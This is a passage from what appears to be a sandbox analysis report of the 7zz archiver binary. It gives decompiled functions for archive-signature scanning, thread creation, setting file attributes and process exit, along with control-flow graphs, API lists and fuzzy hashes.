                                                                                                                                    0x004106f1
                                                                                                                                    0x004106f8
                                                                                                                                    0x004106f8
                                                                                                                                    0x004106fd
                                                                                                                                    0x0041070d
                                                                                                                                    0x00410727
                                                                                                                                    0x0041072b
                                                                                                                                    0x0041072d
                                                                                                                                    0x0041072d
                                                                                                                                    0x0041070f
                                                                                                                                    0x00410722
                                                                                                                                    0x00410722
                                                                                                                                    0x0041070d
                                                                                                                                    0x00410734
                                                                                                                                    0x0041073e
                                                                                                                                    0x00410745
                                                                                                                                    0x0041074a
                                                                                                                                    0x00410751
                                                                                                                                    0x00410a20
                                                                                                                                    0x00410a23
                                                                                                                                    0x00410a2e
                                                                                                                                    0x00410a36
                                                                                                                                    0x00410a36
                                                                                                                                    0x0041058b
                                                                                                                                    0x00410496
                                                                                                                                    0x0041049c
                                                                                                                                    0x00000000
                                                                                                                                    0x004104a3
                                                                                                                                    0x004104a3
                                                                                                                                    0x00000000
                                                                                                                                    0x004104a3

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 00410362
                                                                                                                                      • Part of subcall function 0041003E: __EH_prolog.LIBCMT ref: 00410043
                                                                                                                                    Strings
                                                                                                                                    • 59@, xrefs: 0041036E
                                                                                                                                    • Cannot use absolute pathnames for this command, xrefs: 004105A5
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog
                                                                                                                                    • String ID: 59@$Cannot use absolute pathnames for this command
                                                                                                                                    • API String ID: 3519838083-753490679
                                                                                                                                    • Opcode ID: 1d0b522b18515802e249ba63502b82e806ed444de2582f4dd8cd52e64bc5bade
                                                                                                                                    • Instruction ID: 8adad491b5bf5222f818b6dcdc2d6027f4997ee1019a1a956a15da55c14c090b
                                                                                                                                    • Opcode Fuzzy Hash: 1d0b522b18515802e249ba63502b82e806ed444de2582f4dd8cd52e64bc5bade
                                                                                                                                    • Instruction Fuzzy Hash: D022C330A043849EDB25EB65C851BEE7BA1AF45308F04446FE1562F2D3CBBCA9C8C759
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0042D33C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 156COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 2681 42d33c-42d35a __EH_prolog call 40fac0 2683 42d35f-42d361 2681->2683 2684 42d367-42d370 call 42d51a 2683->2684 2685 42d4cc-42d4da 2683->2685 2688 42d372-42d374 2684->2688 2689 42d379-42d3af call 40fa26 call 46c5c0 2684->2689 2688->2685 2694 42d3b2-42d3b7 2689->2694 2695 42d3d6-42d3f8 2694->2695 2696 42d3b9-42d3c6 2694->2696 2702 42d4b8 2695->2702 2703 42d3fe-42d406 2695->2703 2697 42d47c-42d47f 2696->2697 2698 42d3cc 2696->2698 2700 42d4ba-42d4ca call 407a18 2697->2700 2698->2695 2701 42d3ce-42d3d0 2698->2701 2700->2685 2701->2695 2701->2697 2702->2700 2703->2697 2705 42d408-42d40c 2703->2705 2705->2695 2707 42d40e-42d41e 2705->2707 2708 42d420 2707->2708 2709 42d477-42d47a 2707->2709 2710 42d428 2708->2710 2711 42d45b-42d472 call 46bab0 2709->2711 2713 42d42b-42d42f 2710->2713 2711->2694 2715 42d431-42d433 2713->2715 2716 42d43b 2713->2716 2717 42d435-42d439 2715->2717 2718 42d43d 2715->2718 2716->2718 2717->2713 2718->2711 2719 42d43f-42d448 call 42d4dd 2718->2719 2722 42d481-42d4b4 call 46c5c0 2719->2722 2723 42d44a-42d453 2719->2723 2722->2702 2724 42d422-42d425 2723->2724 2725 42d455-42d458 2723->2725 2724->2710 2725->2711
                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                    			E0042D33C(void* __ecx, void* __eflags) {
				intOrPtr _t57;
				intOrPtr _t65;
				intOrPtr _t67;
				intOrPtr _t69;
				intOrPtr _t71;
				intOrPtr* _t75;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr _t85;
				intOrPtr _t93;
				void* _t95;
				void* _t98;
				intOrPtr* _t100;
				intOrPtr _t104;
				intOrPtr _t107;
				intOrPtr _t109;
				intOrPtr _t110;
				intOrPtr* _t111;
				void* _t113;
				intOrPtr _t115;
				void* _t116;
				void* _t118;
				void* _t119;
				void* _t121;

				L0046B890(0x4774d0, _t116);
				_t119 = _t118 - 0x20;
				_t113 = __ecx;
				_t83 = __ecx + 0x28;
				_t107 = 0x20;
				_t57 = E0040FAC0(__eflags, _t107); // executed
				if(_t57 == 0) {
					if(E0042D51A(_t83) == 0) {
						__eflags = 0;
						 *((intOrPtr*)(_t116 - 0x2c)) = 0x47a7ec;
						 *((intOrPtr*)(_t116 - 0x28)) = 0;
						 *((intOrPtr*)(_t116 - 0x24)) = 0;
						 *((intOrPtr*)(_t116 - 4)) = 0;
						E0040FA26(_t116 - 0x2c, 0x10000);
						 *((intOrPtr*)(_t116 - 0x18)) =  *((intOrPtr*)(_t116 - 0x24));
						 *((intOrPtr*)(_t116 - 0x10)) = _t107;
						E0046C5C0( *((intOrPtr*)(_t116 - 0x24)), _t83, _t107);
						_t109 =  *((intOrPtr*)(_t113 + 0x20));
						_t85 =  *((intOrPtr*)(_t113 + 0x24));
						_t121 = _t119 + 0xc;
						while(1) {
							L4:
							_t100 =  *((intOrPtr*)(_t116 + 0xc));
							__eflags = _t100;
							if(_t100 == 0) {
								goto L8;
							}
							_t95 = _t109 -  *((intOrPtr*)(_t113 + 0x20));
							asm("sbb eax, [esi+0x24]");
							__eflags = _t85 -  *((intOrPtr*)(_t100 + 4));
							if(__eflags > 0) {
								L25:
								_t115 = 1;
							} else {
								if(__eflags < 0) {
									goto L8;
								} else {
									__eflags = _t95 -  *_t100;
									if(_t95 >  *_t100) {
										goto L25;
									} else {
										while(1) {
											L8:
											_t65 =  *((intOrPtr*)(_t116 - 0x10));
											_t67 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t116 + 8)))) + 0xc))( *((intOrPtr*)(_t116 + 8)), _t65 +  *((intOrPtr*)(_t116 - 0x18)), 0x10000 - _t65, _t116 - 0x20);
											__eflags = _t67;
											if(_t67 != 0) {
												break;
											}
											_t69 =  *((intOrPtr*)(_t116 - 0x20));
											 *((intOrPtr*)(_t116 - 0x10)) =  *((intOrPtr*)(_t116 - 0x10)) + _t69;
											__eflags = _t69;
											if(_t69 == 0) {
												goto L25;
											} else {
												__eflags =  *((intOrPtr*)(_t116 - 0x10)) - 0x20;
												if( *((intOrPtr*)(_t116 - 0x10)) <= 0x20) {
													continue;
												} else {
													_t104 = 0;
													_t71 =  *((intOrPtr*)(_t116 - 0x10)) + 0xffffffe0;
													 *((intOrPtr*)(_t116 - 0x14)) = 0;
													__eflags = _t71;
													 *((intOrPtr*)(_t116 - 0x1c)) = _t71;
													if(_t71 <= 0) {
														_t93 =  *((intOrPtr*)(_t116 - 0x18));
														goto L23;
													} else {
														while(1) {
															_t93 =  *((intOrPtr*)(_t116 - 0x18));
															while(1) {
																L15:
																__eflags =  *((char*)(_t104 + _t93)) - 0x37;
																if( *((char*)(_t104 + _t93)) == 0x37) {
																	break;
																}
																__eflags = _t104 - _t71;
																if(__eflags < 0) {
																	_t104 = _t104 + 1;
																	 *((intOrPtr*)(_t116 - 0x14)) = _t104;
																	continue;
																}
																L19:
																if(__eflags == 0) {
																	L23:
																	_t109 = _t109 + _t71;
																	asm("adc ebx, 0x0");
																	 *((intOrPtr*)(_t116 - 0x10)) =  *((intOrPtr*)(_t116 - 0x10)) - _t71;
																	L0046BAB0(_t93, _t71 + _t93,  *((intOrPtr*)(_t116 - 0x10)));
																	_t121 = _t121 + 0xc;
																	goto L4;
																} else {
																	_t75 = E0042D4DD(_t93 + _t104);
																	__eflags = _t75;
																	if(_t75 != 0) {
																		E0046C5C0(_t113 + 0x28,  *((intOrPtr*)(_t116 - 0x14)) +  *((intOrPtr*)(_t116 - 0x18)), 0x20);
																		_t110 = _t109 +  *((intOrPtr*)(_t116 - 0x14));
																		_t80 =  *((intOrPtr*)(_t116 + 8));
																		 *((intOrPtr*)(_t113 + 0x20)) = _t110;
																		_t98 = 0;
																		asm("adc ebx, ecx");
																		_t111 = _t110 + 0x20;
																		__eflags = _t111;
																		 *((intOrPtr*)(_t113 + 0x24)) = _t85;
																		asm("adc ebx, ecx");
																		_t67 =  *((intOrPtr*)( *_t80 + 0x10))(_t80, _t111, _t85, _t98, _t98);
																		goto L27;
																	} else {
																		 *((intOrPtr*)(_t116 - 0x14)) =  *((intOrPtr*)(_t116 - 0x14)) + 1;
																		__eflags =  *((intOrPtr*)(_t116 - 0x14)) -  *((intOrPtr*)(_t116 - 0x1c));
																		if( *((intOrPtr*)(_t116 - 0x14)) <  *((intOrPtr*)(_t116 - 0x1c))) {
																			_t71 =  *((intOrPtr*)(_t116 - 0x1c));
																			_t104 =  *((intOrPtr*)(_t116 - 0x14));
																			_t93 =  *((intOrPtr*)(_t116 - 0x18));
																			continue;
																		} else {
																			_t93 =  *((intOrPtr*)(_t116 - 0x18));
																			_t71 =  *((intOrPtr*)(_t116 - 0x1c));
																			goto L23;
																		}
																	}
																}
																goto L28;
															}
															__eflags = _t104 - _t71;
															goto L19;
														}
													}
												}
											}
											goto L28;
										}
										L27:
										_t115 = _t67;
									}
								}
							}
							L28:
							 *((intOrPtr*)(_t116 - 0x2c)) = 0x47a7ec;
							E00407A18( *((intOrPtr*)(_t116 - 0x24)));
							_t57 = _t115;
							goto L29;
						}
					} else {
						_t57 = 0;
					}
				}
				L29:
				 *[fs:0x0] =  *((intOrPtr*)(_t116 - 0xc));
				return _t57;
			}



























                                                                                                                                    0x0042d341
                                                                                                                                    0x0042d346
                                                                                                                                    0x0042d34c
                                                                                                                                    0x0042d353
                                                                                                                                    0x0042d356
                                                                                                                                    0x0042d35a
                                                                                                                                    0x0042d361
                                                                                                                                    0x0042d370
                                                                                                                                    0x0042d379
                                                                                                                                    0x0042d37b
                                                                                                                                    0x0042d382
                                                                                                                                    0x0042d385
                                                                                                                                    0x0042d390
                                                                                                                                    0x0042d393
                                                                                                                                    0x0042d39e
                                                                                                                                    0x0042d3a1
                                                                                                                                    0x0042d3a4
                                                                                                                                    0x0042d3a9
                                                                                                                                    0x0042d3ac
                                                                                                                                    0x0042d3af
                                                                                                                                    0x0042d3b2
                                                                                                                                    0x0042d3b2
                                                                                                                                    0x0042d3b2
                                                                                                                                    0x0042d3b5
                                                                                                                                    0x0042d3b7
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0042d3bd
                                                                                                                                    0x0042d3c0
                                                                                                                                    0x0042d3c3
                                                                                                                                    0x0042d3c6
                                                                                                                                    0x0042d47c
                                                                                                                                    0x0042d47e
                                                                                                                                    0x0042d3cc
                                                                                                                                    0x0042d3cc
                                                                                                                                    0x00000000
                                                                                                                                    0x0042d3ce
                                                                                                                                    0x0042d3ce
                                                                                                                                    0x0042d3d0
                                                                                                                                    0x00000000
                                                                                                                                    0x0042d3d6
                                                                                                                                    0x0042d3d6
                                                                                                                                    0x0042d3d6
                                                                                                                                    0x0042d3e4
                                                                                                                                    0x0042d3f3
                                                                                                                                    0x0042d3f6
                                                                                                                                    0x0042d3f8
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0042d3fe
                                                                                                                                    0x0042d401
                                                                                                                                    0x0042d404
                                                                                                                                    0x0042d406
                                                                                                                                    0x00000000
                                                                                                                                    0x0042d408
                                                                                                                                    0x0042d408
                                                                                                                                    0x0042d40c
                                                                                                                                    0x00000000
                                                                                                                                    0x0042d40e
                                                                                                                                    0x0042d411
                                                                                                                                    0x0042d413
                                                                                                                                    0x0042d416
                                                                                                                                    0x0042d419
                                                                                                                                    0x0042d41b
                                                                                                                                    0x0042d41e
                                                                                                                                    0x0042d477
                                                                                                                                    0x00000000
                                                                                                                                    0x0042d420
                                                                                                                                    0x0042d428
                                                                                                                                    0x0042d428
                                                                                                                                    0x0042d42b
                                                                                                                                    0x0042d42b
                                                                                                                                    0x0042d42b
                                                                                                                                    0x0042d42f
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0042d431
                                                                                                                                    0x0042d433
                                                                                                                                    0x0042d435
                                                                                                                                    0x0042d436
                                                                                                                                    0x00000000
                                                                                                                                    0x0042d436
                                                                                                                                    0x0042d43d
                                                                                                                                    0x0042d43d
                                                                                                                                    0x0042d45b
                                                                                                                                    0x0042d45b
                                                                                                                                    0x0042d45d
                                                                                                                                    0x0042d460
                                                                                                                                    0x0042d46a
                                                                                                                                    0x0042d46f
                                                                                                                                    0x00000000
                                                                                                                                    0x0042d43f
                                                                                                                                    0x0042d441
                                                                                                                                    0x0042d446
                                                                                                                                    0x0042d448
                                                                                                                                    0x0042d490
                                                                                                                                    0x0042d498
                                                                                                                                    0x0042d49b
                                                                                                                                    0x0042d4a0
                                                                                                                                    0x0042d4a3
                                                                                                                                    0x0042d4a4
                                                                                                                                    0x0042d4a6
                                                                                                                                    0x0042d4a6
                                                                                                                                    0x0042d4a9
                                                                                                                                    0x0042d4b0
                                                                                                                                    0x0042d4b5
                                                                                                                                    0x00000000
                                                                                                                                    0x0042d44a
                                                                                                                                    0x0042d44a
                                                                                                                                    0x0042d450
                                                                                                                                    0x0042d453
                                                                                                                                    0x0042d422
                                                                                                                                    0x0042d425
                                                                                                                                    0x0042d428
                                                                                                                                    0x00000000
                                                                                                                                    0x0042d455
                                                                                                                                    0x0042d455
                                                                                                                                    0x0042d458
                                                                                                                                    0x00000000
                                                                                                                                    0x0042d458
                                                                                                                                    0x0042d453
                                                                                                                                    0x0042d448
                                                                                                                                    0x00000000
                                                                                                                                    0x0042d43d
                                                                                                                                    0x0042d43b
                                                                                                                                    0x00000000
                                                                                                                                    0x0042d43b
                                                                                                                                    0x0042d428
                                                                                                                                    0x0042d41e
                                                                                                                                    0x0042d40c
                                                                                                                                    0x00000000
                                                                                                                                    0x0042d406
                                                                                                                                    0x0042d4b8
                                                                                                                                    0x0042d4b8
                                                                                                                                    0x0042d4b8
                                                                                                                                    0x0042d3d0
                                                                                                                                    0x0042d3cc
                                                                                                                                    0x0042d4ba
                                                                                                                                    0x0042d4bd
                                                                                                                                    0x0042d4c4
                                                                                                                                    0x0042d4ca
                                                                                                                                    0x00000000
                                                                                                                                    0x0042d4ca
                                                                                                                                    0x0042d372
                                                                                                                                    0x0042d372
                                                                                                                                    0x0042d372
                                                                                                                                    0x0042d370
                                                                                                                                    0x0042d4cc
                                                                                                                                    0x0042d4d2
                                                                                                                                    0x0042d4da

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog
                                                                                                                                    • String ID: $c[@
                                                                                                                                    • API String ID: 3519838083-1303465990
                                                                                                                                    • Opcode ID: 69068367b15dc9bd673a90d53c0485621dc67a4ad571aeb8f90f6fb8c481df08
                                                                                                                                    • Instruction ID: dbd63947d3ec36f6418aa11a5244a4fc3f7eb44a15ca7d926c0188e08944aa22
                                                                                                                                    • Opcode Fuzzy Hash: 69068367b15dc9bd673a90d53c0485621dc67a4ad571aeb8f90f6fb8c481df08
                                                                                                                                    • Instruction Fuzzy Hash: 8851A3B1F002199BDB14DFA9D881ABFB7B5FF88304F50852AE405E7340D778A9418B65
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0046CD08 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45threadCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 2757 46cd08-46cd1e call 46fe93 2760 46cd20-46cd51 call 46e370 CreateThread 2757->2760 2761 46cd5b-46cd64 call 46c0ff 2757->2761 2766 46cd53-46cd59 GetLastError 2760->2766 2767 46cd6f-46cd72 2760->2767 2768 46cd66-46cd6c call 4705d3 2761->2768 2769 46cd6d 2761->2769 2766->2761 2768->2769 2769->2767
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E0046CD08(struct _SECURITY_ATTRIBUTES* _a4, char _a8, intOrPtr _a12, intOrPtr _a16, long _a20, DWORD* _a24) {
				void* _t18;
				long _t25;
				void* _t26;

				_t25 = 0;
				_t26 = L0046FE93(1, 0x74);
				if(_t26 == 0) {
					L3:
					E0046C0FF(_t26);
					if(_t25 != 0) {
						E004705D3(_t25);
					}
					return 0;
				}
				E0046E370(_t26);
				 *(_t26 + 4) =  *(_t26 + 4) | 0xffffffff;
				 *((intOrPtr*)(_t26 + 0x48)) = _a12;
				 *((intOrPtr*)(_t26 + 0x4c)) = _a16;
				_t9 =  &_a8; // 0x414677
				_t18 = CreateThread(_a4,  *_t9, E0046CD73, _t26, _a20, _a24); // executed
				if(_t18 == 0) {
					_t25 = GetLastError();
					goto L3;
				}
				return _t18;
			}






                                                                                                                                    0x0046cd11
                                                                                                                                    0x0046cd18
                                                                                                                                    0x0046cd1e
                                                                                                                                    0x0046cd5b
                                                                                                                                    0x0046cd5c
                                                                                                                                    0x0046cd64
                                                                                                                                    0x0046cd67
                                                                                                                                    0x0046cd6c
                                                                                                                                    0x00000000
                                                                                                                                    0x0046cd6d
                                                                                                                                    0x0046cd21
                                                                                                                                    0x0046cd2d
                                                                                                                                    0x0046cd31
                                                                                                                                    0x0046cd3a
                                                                                                                                    0x0046cd43
                                                                                                                                    0x0046cd49
                                                                                                                                    0x0046cd51
                                                                                                                                    0x0046cd59
                                                                                                                                    0x00000000
                                                                                                                                    0x0046cd59
                                                                                                                                    0x0046cd72

                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0046FE93: HeapAlloc.KERNEL32(00000008,?,00000000,00000000,00000001,0046E3A8,00000001,00000074,?,?,00000000,00000001), ref: 0046FF89
                                                                                                                                    • CreateThread.KERNELBASE ref: 0046CD49
                                                                                                                                    • GetLastError.KERNEL32(?,00467AE9,00000000,00000000,004148ED,?,00000000,?,?,00414677,?,?), ref: 0046CD53
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocCreateErrorHeapLastThread
                                                                                                                                    • String ID: wFA
                                                                                                                                    • API String ID: 3580101977-151469634
                                                                                                                                    • Opcode ID: df8301676c31f63ea71523d33cdd80f5607fda67a8a03215c223b9ed0b2ffcf2
                                                                                                                                    • Instruction ID: 3bcaffb1de1f861aa2c0b81efa8886cf09e347fde19023c9913c4d3a853d5ec3
                                                                                                                                    • Opcode Fuzzy Hash: df8301676c31f63ea71523d33cdd80f5607fda67a8a03215c223b9ed0b2ffcf2
                                                                                                                                    • Instruction Fuzzy Hash: 0DF0F4366006116BDB209F66EC41DAB3FA5DF81771B10443FFA5C82690EB3988518BAA
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00409A29 Relevance: 4.6, APIs: 3, Instructions: 65COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 2772 409a29-409a44 __EH_prolog 2773 409a46-409a68 call 409ad5 call 4099a0 call 407a18 2772->2773 2774 409a6a-409a76 SetFileAttributesW 2772->2774 2778 409ac6-409ad4 2773->2778 2775 409a78-409a7a 2774->2775 2776 409a7c-409aa1 call 401e9a call 40b863 2774->2776 2775->2778 2788 409aa3-409ab9 SetFileAttributesW call 407a18 2776->2788 2789 409abb-409ac4 call 407a18 2776->2789 2788->2778 2789->2778
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00409A29(WCHAR* __ecx, long __edx) {
				int _t18;
				signed int _t23;
				int _t24;
				signed int _t28;
				void* _t54;

				L0046B890(0x473a24, _t54);
				_t48 = __edx;
				if( *0x490a7c != 0) {
					_t18 = SetFileAttributesW(__ecx, __edx); // executed
					if(_t18 == 0) {
						 *(_t54 - 0x18) = 0;
						 *((intOrPtr*)(_t54 - 0x14)) = 0;
						 *((intOrPtr*)(_t54 - 0x10)) = 0;
						E00401E9A(_t54 - 0x18, 3);
						 *(_t54 - 4) =  *(_t54 - 4) & 0x00000000;
						if(L0040B863(_t54 - 0x18) == 0) {
							E00407A18( *(_t54 - 0x18));
							_t23 = 0;
						} else {
							_t24 = SetFileAttributesW( *(_t54 - 0x18), _t48);
							_t23 = E00407A18( *(_t54 - 0x18)) & 0xffffff00 | _t24 != 0x00000000;
						}
					} else {
						_t23 = 1;
					}
				} else {
					_t28 = E004099A0( *((intOrPtr*)(E00409AD5(_t54 - 0x24, __ecx))), __edx);
					E00407A18( *((intOrPtr*)(_t54 - 0x24)));
					_t23 = _t28;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t54 - 0xc));
				return _t23;
			}








                                                                                                                                    0x00409a2e
                                                                                                                                    0x00409a40
                                                                                                                                    0x00409a44
                                                                                                                                    0x00409a72
                                                                                                                                    0x00409a76
                                                                                                                                    0x00409a83
                                                                                                                                    0x00409a86
                                                                                                                                    0x00409a89
                                                                                                                                    0x00409a8c
                                                                                                                                    0x00409a91
                                                                                                                                    0x00409aa1
                                                                                                                                    0x00409abe
                                                                                                                                    0x00409ac4
                                                                                                                                    0x00409aa3
                                                                                                                                    0x00409aa7
                                                                                                                                    0x00409ab6
                                                                                                                                    0x00409ab6
                                                                                                                                    0x00409a78
                                                                                                                                    0x00409a78
                                                                                                                                    0x00409a78
                                                                                                                                    0x00409a46
                                                                                                                                    0x00409a56
                                                                                                                                    0x00409a60
                                                                                                                                    0x00409a66
                                                                                                                                    0x00409a66
                                                                                                                                    0x00409acc
                                                                                                                                    0x00409ad4

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 00409A2E
                                                                                                                                    • SetFileAttributesW.KERNELBASE(?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00409A72
                                                                                                                                      • Part of subcall function 00409AD5: __EH_prolog.LIBCMT ref: 00409ADA
                                                                                                                                      • Part of subcall function 00409AD5: AreFileApisANSI.KERNEL32(?,?,?,?,?,00000000), ref: 00409AF6
                                                                                                                                      • Part of subcall function 004099A0: SetFileAttributesA.KERNEL32(?,?,00409A5B,?,?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 004099A2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$AttributesH_prolog$Apis
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1724483454-0
                                                                                                                                    • Opcode ID: 43186953be5daf0de57b10679b82a724e15aa266f1dac7b6fd580aaf3804a6e7
                                                                                                                                    • Instruction ID: 62381452fa1776ecf317f5749025f9a102d19c157996ae2428c02df752bbe2da
                                                                                                                                    • Opcode Fuzzy Hash: 43186953be5daf0de57b10679b82a724e15aa266f1dac7b6fd580aaf3804a6e7
                                                                                                                                    • Instruction Fuzzy Hash: 9B116372F002459BCF04EF6698426AEBBB9DF85354F14443FE501B72D2DA3C4E059BA9
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0046E717 Relevance: 4.6, APIs: 3, Instructions: 51COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 2794 46e717-46e726 call 46e7bc 2797 46e728-46e733 GetCurrentProcess TerminateProcess 2794->2797 2798 46e739-46e74f 2794->2798 2797->2798 2799 46e751-46e758 2798->2799 2800 46e78d-46e7a1 call 46e7ce 2798->2800 2801 46e77c-46e78c call 46e7ce 2799->2801 2802 46e75a-46e766 2799->2802 2808 46e7a3-46e7a9 call 46e7c5 2800->2808 2809 46e7aa-46e7b4 ExitProcess 2800->2809 2801->2800 2805 46e77b 2802->2805 2806 46e768-46e76c 2802->2806 2805->2801 2810 46e770-46e779 2806->2810 2811 46e76e 2806->2811 2810->2805 2810->2806 2811->2810
                                                                                                                                    C-Code - Quality: 80%
                                                                                                                                    			E0046E717(void* __esi, int _a4, intOrPtr _a8, char _a12) {
				intOrPtr _t9;
				intOrPtr* _t11;
				char _t16;
				intOrPtr _t22;
				intOrPtr _t23;
				void* _t24;
				intOrPtr* _t25;
				void* _t27;
				void* _t32;

				_t24 = __esi;
				E0046E7BC();
				_t23 = 1;
				_t27 =  *0x49372c - _t23; // 0x1
				if(_t27 == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				_t16 = _a12;
				 *0x493728 = _t23;
				 *0x493724 = _t16;
				if(_a8 == 0) {
					_t9 =  *0x496594; // 0x22759d0
					if(_t9 != 0) {
